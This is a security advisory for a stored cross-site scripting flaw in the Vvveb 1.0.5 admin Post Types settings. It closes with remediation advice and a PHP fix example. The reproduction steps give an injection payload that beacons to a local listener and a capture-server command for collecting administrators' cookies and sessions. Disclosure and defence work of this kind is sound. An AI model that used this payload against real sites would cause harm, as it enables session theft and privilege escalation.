Vvveb - v1.0.5 - Cross-Site Scripting via navbar

By 0xhamy 04:58 PM - October 22nd 2025
Type: software
Product Environment: web
Product Name: Vvveb
Product Vendor: givanz
Product Version: 1.0.5
Product Link: https://github.com/givanz/Vvveb
Vulnerability Name: Cross-Site Scripting
Severity: High
CVSS String: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
CVSS Score: 8.7
CVE ID: CVE-2025-8521
Vendor Acknowledgement: Yes
Affected Digital Assets: 268
Affected Users: 26800
Date of Reporting: Jan 03, 2025
PoC Exploit: https://gist.github.com/0xHamy/b2674eeffd1f73af96d29f152c47bcbd
Credit: 0xhamy

Description

Vvveb 1.0.5 is vulnerable to stored, site-wide cross-site scripting (XSS) via the admin settings page at /vadmin123/index.php?module=settings/post-types.
Malicious HTML/JS injected into the Post Type “type” field is persisted and subsequently executed on every admin panel page under /vadmin123/ whenever a user views one. Attackers holding a logged-in admin-level role (e.g., Site Administrator, Administrator, or Super Administrator) can leverage this to silently steal sessions and perform actions as other administrators; a lower-privileged admin can escalate to Super Administrator by hijacking that user's session.

Vulnerability Details

The Post Types configuration accepts unsanitized input for post_type[type]. The stored payload is rendered within admin views without encoding, so it executes in the Vvveb origin for any authenticated admin who visits the panel. Because execution occurs in privileged contexts, the payload can exfiltrate cookies/session tokens and issue authenticated API requests, affecting every role that uses the panel (admins, editors, vendors, etc.).

Steps to Reproduce

  1. Log in with an admin-capable role.
     Use an account with Site Administrator, Administrator, or Super Administrator privileges.

  2. Open Post Types settings.
     Navigate to:

     /vadmin123/index.php?module=settings/post-types

  3. Insert a stored XSS payload.
     Click Add type. In the field name="post_type[type]", input:

     "><img src="http://127.0.0.1:1718/capture.php">

     (The example payload beacons to a listener; replace it with your test endpoint.)

  4. Trigger across the admin panel.
     Visit any admin page under /vadmin123/. The payload executes on view, enabling silent cookie/session theft and authenticated actions as the victim.

  5. (Optional) Listener setup for verification.
     Use the PHP capture script from the PoC gist linked above and run:

     php -S 0.0.0.0:1718

     Observe inbound requests carrying the victim's cookies/session data.


Recommendation

  • Sanitize admin-configurable fields with an allow-list HTML sanitizer; strip scripts, event handlers, and dangerous attributes.
  • Encode on render in admin views (treat configuration values as text unless explicitly needed and safe).
  • Harden CSP (disallow inline scripts; restrict img-src/connect-src to trusted domains).
  • Add role-based approvals or preview workflows for settings that influence global admin UI rendering.
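The fix pattern behind the first three recommendations, as an added PHP example that is not Vvveb's own code: reject the value at save time with an allow-list, encode it at render time, and send a CSP that blocks inline script and off-origin beacons. The function names, the assumption that a post type "type" is a machine slug (so a character allow-list is sufficient instead of a full HTML sanitizer), the data-type attribute render context, and the CSP values are all assumptions for illustration, not details taken from Vvveb's source.

```php
<?php
// Added example, not Vvveb's own code. Demonstrates the fix pattern from the
// Recommendation section for the post_type[type] field behind CVE-2025-8521.
// Assumptions (not from the advisory): the type is a machine slug, the admin
// view renders it inside a double-quoted attribute and as element text, and
// the CSP sources below match the deployment.

declare(strict_types=1);

/**
 * Validate a post type identifier on save. Returns the slug, or null when it
 * is rejected. Allow-list policy (assumed): a-z, 0-9, underscore, hyphen, 1-64 chars.
 */
function validatePostTypeSlug(string $input): ?string
{
    $slug = trim($input);
    return preg_match('/\A[a-z0-9_-]{1,64}\z/', $slug) === 1 ? $slug : null;
}

/** Encode a value for HTML text content or a double-quoted attribute. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable rendering: the raw stored value lands in an attribute and in text. */
function renderNavItemUnsafe(string $type): string
{
    return '<a class="nav-link" data-type="' . $type . '">' . $type . '</a>';
}

/** Hardened rendering: same markup, value encoded in both contexts. */
function renderNavItemSafe(string $type): string
{
    return '<a class="nav-link" data-type="' . e($type) . '">' . e($type) . '</a>';
}

/**
 * CSP for the admin panel (example policy): no inline script, and img-src /
 * connect-src limited to the site's own origin so a stored <img> or fetch()
 * beacon to an attacker host is blocked by the browser even if encoding is missed.
 */
function adminCspHeaderValue(): string
{
    return "default-src 'self'; script-src 'self'; img-src 'self' data:; "
         . "connect-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'";
}

function sendAdminCsp(): void
{
    header('Content-Security-Policy: ' . adminCspHeaderValue());
}

// Demonstration run using the payload quoted in the advisory (constructed input).
$payload = '"><img src="http://127.0.0.1:1718/capture.php">';

echo renderNavItemUnsafe($payload), PHP_EOL;  // attribute closed early, <img> injected
echo renderNavItemSafe($payload), PHP_EOL;    // &quot;&gt;&lt;img ... stays inert text

var_dump(validatePostTypeSlug($payload));     // NULL: rejected before it is stored
var_dump(validatePostTypeSlug('product'));    // string(7) "product": accepted
```

Validation on save and encoding on render are independent layers: the allow-list stops the advisory's payload from ever being persisted, while the encoder protects any value that reached the database before the fix, and the CSP limits what a missed case can do.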